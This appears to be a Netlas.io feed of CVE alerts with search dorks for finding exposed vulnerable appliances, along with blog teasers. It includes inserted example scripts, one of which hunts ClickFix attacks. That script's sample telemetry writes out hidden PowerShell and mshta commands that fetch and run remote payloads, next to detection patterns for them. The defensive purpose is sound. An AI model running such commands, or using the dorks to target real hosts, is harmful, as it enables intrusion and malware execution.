Netlas.io
Explore the latest in cybersecurity with Netlas.io. Stay ahead with updates on high-profile vulnerabilities, expert tutorials, essential safety tips, and the latest Netlas developments.
CVE-2026-4112 and others: SQL injection and TOTP vulnerabilities in SonicWall SMA 1000 Series, rated up to 7.2 ❗️
The most severe of them (an SQL injection) allows a remote, authenticated attacker holding read-only administrator privileges to escalate to primary administrator.
Search at Netlas.io:
👉 Link: https://nt.ls/mzseI
👉 Dork: http.favicon.hash_sha256:6bb6f64adaa6a7ed4da10a2fe4edf4cb4d9914aa742c7ad607ca4ca678dcd3f1 OR certificate.subject_dn:"HTTPS Management Certificate for SonicWALL (self-signed)"
Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0003
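The favicon part of the dork above is nothing more than the SHA-256 of the appliance's favicon. The following is an added example (not Netlas's own code) that reproduces such a hash from a favicon file and joins it with a certificate-subject fingerprint in the same shape as the SMA 1000 dork. Assumptions not stated on the page: Netlas hashes the raw bytes served at /favicon.ico, and quoted values accept Lucene-style backslash escaping; the sample icon bytes are constructed, not a vendor favicon.

```python
"""Reproduce a Netlas favicon dork from a favicon file.

Added example, not Netlas's own code. Assumptions (not stated on the page):
the http.favicon.hash_sha256 field holds the hex SHA-256 of the raw bytes
served at /favicon.ico, and quoted values follow Lucene-style escaping.
"""
import hashlib
import urllib.request
from typing import Iterable


def favicon_sha256(favicon_bytes: bytes) -> str:
    """Hex SHA-256 of the raw icon bytes (no base64 step, no mmh3 as in other engines)."""
    return hashlib.sha256(favicon_bytes).hexdigest()


def favicon_dork(favicon_bytes: bytes) -> str:
    """Netlas search term matching every host that serves exactly this favicon."""
    return f"http.favicon.hash_sha256:{favicon_sha256(favicon_bytes)}"


def quoted_field(field: str, value: str) -> str:
    """Build field:"value" for phrase fields such as certificate.subject_dn."""
    escaped = value.replace("\\", "\\\\").replace('"', '\\"')  # assumed Lucene-style escaping
    return f'{field}:"{escaped}"'


def combine_dorks(dorks: Iterable[str], op: str = "OR") -> str:
    """Join several fingerprints so a host matching any (OR) or all (AND) of them is returned."""
    if op not in ("AND", "OR"):
        raise ValueError("op must be AND or OR")
    terms = [d.strip() for d in dorks if d and d.strip()]
    if not terms:
        raise ValueError("at least one dork is required")
    return f" {op} ".join(terms)


def fetch_favicon(base_url: str, timeout: float = 10.0) -> bytes:
    """Download /favicon.ico from a host you are authorised to test (network; unused offline)."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/favicon.ico", timeout=timeout) as resp:
        return resp.read()


# Constructed placeholder icon (an ICO header followed by zero bytes), not a vendor favicon.
SAMPLE_FAVICON = b"\x00\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00" + b"\x00" * 32


def sonicwall_style_dork(favicon_bytes: bytes, cert_subject: str) -> str:
    """Favicon hash OR certificate subject, the shape of the SMA 1000 dork above."""
    return combine_dorks([favicon_dork(favicon_bytes),
                          quoted_field("certificate.subject_dn", cert_subject)])


if __name__ == "__main__":
    print(sonicwall_style_dork(SAMPLE_FAVICON,
                               "HTTPS Management Certificate for SonicWALL (self-signed)"))
```

Run it against a favicon you downloaded from an appliance in your own scope and compare the printed hash with the one in the post; a mismatch usually means the vendor shipped a different icon in that firmware line, so you need both hashes OR'd together.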
🔄 How to Find Unprotected Databases — Chapter 2
A Netlas beginner’s guide — now republished on our blog (moved from Medium). Reviewed and updated.
🕒 5 min read
👉 https://netlas.io/blog/how_to_find_unprotected_databases_chapter_2/
CVE-2026-0740: Vulnerability in Ninja Forms WordPress plugin, 9.8 rating
The vulnerability allows unauthenticated attackers to upload arbitrary files to a vulnerable site and achieve remote code execution.
Search at Netlas.io:
👉 Link: https://nt.ls/rkM7h
👉 Dork: http.body:"plugins/ninja-forms"
Read more: https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/
CVE-2026-3429, CVE-2026-4636 and others in Keycloak.
Several vulnerabilities in Keycloak allow attackers to bypass MFA, steal access tokens, and access confidential user data.
Search at Netlas.io:
👉 Link: https://nt.ls/Ooqi1
👉 Dork: http.favicon.hash_sha256:47dcf1f1a8f1afd68297a294a263849069a7a62b2e86550241416c2cc56c5676
Vendor's advisory: https://www.keycloak.org/2026/04/keycloak-2657-released
⭐️ Ever wondered how professional threat intelligence feeds are actually built?
Our partners at RST Cloud pull back the curtain on their approach to threat hunting — revealing how they identify, track, and expand command-and-control (C2) infrastructure at scale.
🔍 Inside the post:
• How RST Cloud discovers malicious infrastructure in the wild
• Techniques for linking isolated IoCs into meaningful threat clusters
• The methodology behind building reliable, high-quality threat intelligence feeds
• How Netlas data helps enrich and accelerate investigations
This is a rare look into the real workflows behind modern threat intelligence — straight from a team doing it every day.
🕒 5 min read
👉 https://netlas.io/blog/с2_hunting_by_rst_cloud/
🔄 Netlas and Uncover
The article has been updated. All commands were reviewed and tested.
👉🏼 Read the guide:
https://netlas.io/blog/netlas_and_uncover/
Netlas Legal Update
We’ve revised the Netlas Terms & Conditions and API & Data License Agreement.
The updated terms take effect on March 6, 2026.
Details: https://netlas.io/blog/terms_updated/
Netlas v1.6 is out
🔍 Private Scanner now supports “Scan all ports” — non-intrusive scans across 65,536 TCP ports.
🆕 Added CWMP protocol support.
⚠️ Breaking change: updated Discovery API response format for groups.
Details at https://docs.netlas.io/changelog/
CVE-2026-1490: Vulnerability in CleanTalk WordPress plugin, 9.8 rating 🔥
The vulnerability allows unauthenticated attackers to install arbitrary plugins on an affected site, a natural first step in a longer attack chain.
Search at Netlas.io:
👉 Link: https://nt.ls/wZ4Qu
👉 Dork: http.body:"plugins/cleantalk-spam-protect"
Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-honeypot-anti-spam-by-cleantalk-671-authorization-bypass-via-reverse-dns-ptr-record-spoofing-to-unauthenticated-arbitrary-plugin-installation
📌 Top 10 Hacking Devices for Ethical Hackers in 2026
Here is a practical guide to the hardware pentesting toolkit that keeps showing up in real engagements: what each device does, what it’s good for, and where the legal/ethical lines are.
What you’ll get from the list:
1️⃣ Flipper Zero 🐬: a pocket multi-tool for Sub-GHz, RFID/NFC, IR and more, plus real-world examples of signal abuse.
2️⃣ USB Rubber Ducky 🦆: HID “keyboard” injection that turns physical access into instant scripted actions.
3️⃣ Wi-Fi / wireless pentest gear 📡: purpose-built tools for testing how networks handle rogue access points and user behavior.
4️⃣ RFID/NFC specialists 🎫: devices like Proxmark3 for assessing badge systems and weak access control tech.
5️⃣ SDR hardware 📻: HackRF and friends for exploring radio-based attack surfaces beyond “normal” Wi-Fi/Bluetooth.
6️⃣ Clear boundaries ⚖️: what’s generally legal to own vs. what becomes illegal fast without written permission and scope.
If you’re building a red-team kit (or defending against these exact techniques), this one’s a solid bookmark. 🔎🛡️
👉 Read here: https://netlas.io/blog/top_10_hacking_devices_2026/
CVE-2026-1207, -1285, -1287 and others: Multiple vulnerabilities in Django Framework, rated 5.3 to 7.5 ❗️
Several vulnerabilities in Django allow attackers to perform SQL injection and denial-of-service attacks.
Search at Netlas.io:
👉 Link: https://nt.ls/SOxq1
👉 Dork: tag.name:"django"
Vendor's advisory: https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
CVE-2026-1281, -1340: Two vulnerabilities in Ivanti EPMM, 9.8 rating 🔥
Two recent vulnerabilities in Ivanti EPMM allow attackers to achieve remote code execution. Exploitation has already been reported in the wild!
Search at Netlas.io:
👉 Link: https://nt.ls/EbWv1
👉 Dork: http.headers.set_cookie:("JSESSIONID" "Path" "/mifs")
Vendor's advisory: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340?language=en_US
📌 Inside ClickFix: how fake prompts took over the web
Fake CAPTCHAs and “verification” pages coax users into pasting system commands into trusted tools such as the Run dialog or PowerShell. No exploit, no download: the victim executes the payload themselves, sidestepping many defenses.
What’s inside
1️⃣ The evolution: from simple error popups to polished reCAPTCHA/Turnstile clones, OS-aware pages, and video walk-throughs that raise urgency.
2️⃣ Scale of the problem: ESET tracked a 517% rise (H2’24→H1’25); ClickFix-style lures now account for ~8% of blocked attacks.
3️⃣ APT adoption: ClearFake, TA571, Lazarus, Kimsuky, Callisto/Sednit, MuddyWater, APT36 — cross-platform, high-impact use.
4️⃣ Anatomy of an attack: delivery → deceptive prompt → clipboard injection → user-initiated execution → payload retrieval.
5️⃣ Real-world sample: a faux CAPTCHA plants a VBS downloader command, then runs the fetched script from %TEMP%.
6️⃣ Why it lands: Microsoft’s 2025 report calls ClickFix the top initial-access vector, tied to 47% of recorded intrusions.
Bonus: the article includes hunting tips and how to stop these chains at scale. 🔎🛡️
👉 Read here: https://netlas.io/blog/fake_prompts/
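The chain in item 4 ends with the victim pasting the command into the Run dialog or a shell, and that is where it is most visible in telemetry: a scripting host spawned by explorer.exe with a command line carrying a hidden window, a remote fetch, in-memory execution, a %TEMP% drop, or the lure's own "I am not a robot" comment. The following is an added hunting example (not from the Netlas article and not a published detection rule) run over constructed Sysmon-like process-creation events; the field names and the scoring thresholds are assumptions, and the IPs are from a documentation range.

```python
"""Hunt for ClickFix-style executions in process-creation telemetry.

Added example, not from the Netlas article. Events are constructed
Sysmon-like records with documentation-range IPs; field names, indicator
list and threshold are assumptions to adapt to your own telemetry.
"""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "bitsadmin.exe"}
# Win+R (Run) and the Explorer address bar both spawn children of explorer.exe.
USER_LAUNCHERS = {"explorer.exe"}

INDICATORS: List[Tuple[str, str]] = [
    (r"-(?:w|window(?:style)?)\s+hidden", "hidden window"),
    (r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
     r"|mshta(?:\.exe)?\s+https?://", "remote payload fetch"),
    (r"https?://", "URL in command line"),
    (r"%temp%|\\appdata\\local\\temp\\", "runs from %TEMP%"),
    (r"\.vbs\b|\.hta\b", "script dropper"),
    (r"#\s*.*?(?:not a robot|verif|captcha|human)", "ClickFix lure comment"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in INDICATORS]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, reasons). Parent/child shape is worth 2, each indicator 1."""
    reasons: List[str] = []
    score = 0
    if _basename(ev["image"]) in SCRIPT_HOSTS and _basename(ev["parent_image"]) in USER_LAUNCHERS:
        score += 2
        reasons.append("script host spawned by explorer.exe (Run dialog / address bar)")
    for rx, label in COMPILED:
        if rx.search(ev["command_line"]):
            score += 1
            reasons.append(label)
    return score, reasons


def hunt(events: List[Dict[str, str]], threshold: int = 3) -> List[Dict[str, str]]:
    """Events at or above the threshold, each annotated with its score and reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({**ev, "score": str(score), "reasons": "; ".join(reasons)})
    return hits


# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "evt-1", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c \"iex (iwr 'http://203.0.113.10/v.vbs' -UseBasicParsing).Content\" "
                     "# \u2705 I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"id": "evt-2", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://203.0.113.10/verify.hta"},
    {"id": "evt-3", "parent_image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Service"},  # benign admin use
    {"id": "evt-4", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c \"cd %TEMP% && cscript //nologo upd.vbs\""},
    {"id": "evt-5", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["id"], hit["score"], hit["reasons"])
```

The benign PowerShell launch from a terminal (evt-3) scores zero because neither the parent nor the command line matches, while the Run-dialog launches score on shape and content together; the RunMRU registry key and clipboard-paste events, where your EDR exposes them, are natural extra signals to fold into the same scoring.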
Top 10 Critical Threat Actors - who they are, how they operate, how to respond 📌
Netlas distills the ten most consequential adversaries shaping 2026 risk. For each actor you get a clean snapshot: motives, preferred targets, initial-access methods, tooling/C2 habits, notable intrusions, and concrete detections/mitigations.
What’s inside:
✅ Clear selection criteria (impact, capability, tempo, cross-sector reach) for each actor.
🛠️ Playbook patterns you’ll actually see: phishing & social engineering, supply-chain/third-party abuse, cloud & SaaS compromise, data theft and extortion.
🌐 Infrastructure habits: rotating domains/hosts, abuse of legitimate services, and operational security tells defenders can hunt for.
🏛️ Sector focus: government, finance, telco, healthcare, manufacturing, and critical infrastructure - with risk notes per vertical.
🔐 Copy-paste defenses: phishing-resistant MFA, hardening endpoints and SaaS, egress/DNS controls, backup immutability, logging that supports fast IR, and tabletop exercises mapped to these actors.
A practical brief for CISOs, IR leads, and engineering managers planning 2026 controls.
👉 Read now: https://netlas.io/blog/top_10_critical_threat_actors/
CVE-2025-59718, -59719: Improper Verification of Cryptographic Signature in Fortinet devices, 9.8 rating 🔥
Fortinet researchers have observed exploitation of last year's vulnerabilities that bypasses the patches. We recommend reviewing the mitigation recommendations in the advisory.
Search at Netlas.io:
👉 Link: https://nt.ls/X38VT
👉 Dork: http.favicon.hash_sha256:d18b3c9feb76c3c1cfdcc51c732f113327e3c33fb3f63b479951f7da6ed1216f
Vendor's advisory: https://www.fortinet.com/blog/psirt-blogs/analysis-of-sso-abuse-on-fortios
CVE-2025-13927, -13928, -13335, CVE-2026-0723, -1102: Multiple vulnerabilities in GitLab, rated 3.1 to 7.5 ❗️
Several recent vulnerabilities in GitLab include denial of service, incorrect authorization, and other issues.
Search at Netlas.io:
👉 Link: https://nt.ls/5JrG3
👉 Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2026/01/21/patch-release-gitlab-18-8-2-released/
CVE-2025-37165, -37166: Multiple vulnerabilities in HPE Aruba, 7.5 rating ❗️
Vulnerabilities in HPE Aruba allow an attacker to cause a denial of service or learn the internal network configuration.
Search at Netlas.io:
👉 Link: https://nt.ls/AlIHR
👉 Dork: http.favicon.hash_sha256:dfa04944308ed6c96563ff88cdb767ed5177c76c8a386f7a5803b534e9bff753
Vendor's advisory: https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US#hpesbnw04988-rev-1-hpe-networking-instant-on-multi-0
📌 Bug Bounty 101 — a complete 2026 roadmap for beginners
Netlas’ new guide cuts through the “dead vs $100k” hype: bug bounty isn’t dead, it’s just more mature. Success now comes from smart target selection, solid recon, manual testing, and reports that get accepted.
What’s inside:
1️⃣ Prerequisites checklist: networking, HTTP basics, light coding, core vulns, and why patience/focus matter.
2️⃣ Picking targets: start with VDPs and less-crowded programs; use HackerOne/Bugcrowd/Intigriti and Google dorks to find scopes; stick to one target.
3️⃣ Recon that works: org WHOIS → asset mapping → subdomains; customize your flow, with a concrete Netlas example and CLI tips.
4️⃣ Hunting methodology: build product knowledge first; use a single multi-signal test string to probe inputs; avoid blind payload spam.
5️⃣ Reports that get paid and beginner mistakes to avoid, plus a practical 60-day plan to your first live finding.
👉 Read here: https://netlas.io/blog/bug_bounty_roadmap/
📌 Software Supply Chain Attacks — how trust breaks, and how to fix it
Modern apps lean on open-source packages, registries, clouds, and CI/CD. When any upstream link is compromised, clean projects ship trojanized code — as in the CCleaner incident. This explainer maps where trust fails and what to harden.
What’s inside:
1️⃣ The chain itself: repos, dependency managers, CI/CD, artifact storage — and the weak assumptions they rely on.
2️⃣ How attacks land: stolen maintainer accounts, poisoned updates, abused credentials, and automated pulls.
3️⃣ Case in point: a signed build gone rogue (CCleaner) shows why “official” isn’t always safe.
4️⃣ Mitigations that matter: SBOMs, provenance and signed builds to verify what you ship and where it came from.
👉 Full article here: https://netlas.io/blog/supply_chain_attack/
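Item 4 names SBOMs, provenance and signed builds as the controls that verify what you ship. The following is an added example (not from the Netlas article and not any project's release tooling) of the simplest form of that check: a CycloneDX SBOM records one SHA-256 per component at build time, and the deploy step refuses any artifact whose bytes no longer match, which is exactly the substitution a trojanized build depends on going unnoticed. Component names, versions and binary bytes are constructed, and the SBOM is generated from the known-good build so that no digest is hand-typed.

```python
"""Verify shipped artifacts against the hashes recorded in an SBOM.

Added example, not from the Netlas article. Component names, versions and
bytes are constructed; the CycloneDX document is built from the known-good
build outputs and then used to gate a later (possibly tampered) release.
"""
import hashlib
import json
from typing import Dict, Tuple

ArtifactMap = Dict[str, Tuple[str, bytes]]  # name -> (version, bytes)


def make_sbom(build_outputs: ArtifactMap) -> str:
    """Minimal CycloneDX 1.5 JSON recording one SHA-256 per component."""
    components = [
        {"type": "library", "name": name, "version": version,
         "hashes": [{"alg": "SHA-256", "content": hashlib.sha256(data).hexdigest()}]}
        for name, (version, data) in build_outputs.items()
    ]
    return json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.5",
                       "version": 1, "components": components})


def expected_hashes(sbom_json: str) -> Dict[str, str]:
    """Map name@version -> expected SHA-256 hex, ignoring other hash algorithms."""
    bom = json.loads(sbom_json)
    if bom.get("bomFormat") != "CycloneDX":
        raise ValueError("not a CycloneDX document")
    expected: Dict[str, str] = {}
    for comp in bom.get("components", []):
        key = f"{comp['name']}@{comp.get('version', '')}"
        for h in comp.get("hashes", []):
            if h.get("alg") == "SHA-256":
                expected[key] = h["content"].lower()
    return expected


def verify_artifact(name: str, version: str, data: bytes, sbom_json: str) -> Tuple[bool, str]:
    """True only if the artifact is listed and its bytes hash to the recorded value."""
    key = f"{name}@{version}"
    want = expected_hashes(sbom_json).get(key)
    if want is None:
        return False, f"{key} not recorded in SBOM"
    got = hashlib.sha256(data).hexdigest()
    if got != want:
        return False, f"{key} digest mismatch: expected {want[:12]}..., got {got[:12]}..."
    return True, f"{key} verified"


def verify_release(release: ArtifactMap, sbom_json: str) -> Dict[str, bool]:
    """Gate a whole release: every artifact must verify, and unlisted extras fail."""
    return {name: verify_artifact(name, version, data, sbom_json)[0]
            for name, (version, data) in release.items()}


# Constructed build outputs, the clean state the CI job recorded.
GOOD_BUILD: ArtifactMap = {
    "acme-agent": ("5.33.0", b"MZ\x90\x00constructed agent binary v5.33.0"),
    "acme-updater": ("1.2.0", b"MZ\x90\x00constructed updater v1.2.0"),
}
SBOM = make_sbom(GOOD_BUILD)

# A release where one binary was swapped after the build, the CCleaner-style failure.
TAMPERED_RELEASE: ArtifactMap = {
    "acme-agent": ("5.33.0", b"MZ\x90\x00constructed agent binary v5.33.0 + implant"),
    "acme-updater": ("1.2.0", GOOD_BUILD["acme-updater"][1]),
}

if __name__ == "__main__":
    print(verify_release(GOOD_BUILD, SBOM))        # both True
    print(verify_release(TAMPERED_RELEASE, SBOM))  # acme-agent False
```

The check only helps if the SBOM itself is trustworthy, so in practice it is produced inside the build, signed together with the artifacts, and fetched from a location the deploy job trusts rather than from the same download page as the binaries.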
❗️Technical Issue Alert❗️
Due to issues with the database cluster, Netlas is temporarily suspended while the affected nodes are rebooted.
Our team is working hard to resolve the issue as quickly as possible.
👉 You can also follow the Netlas status on the corresponding page: https://status.netlas.io/
We sincerely apologize for the inconvenience and appreciate your patience 🙏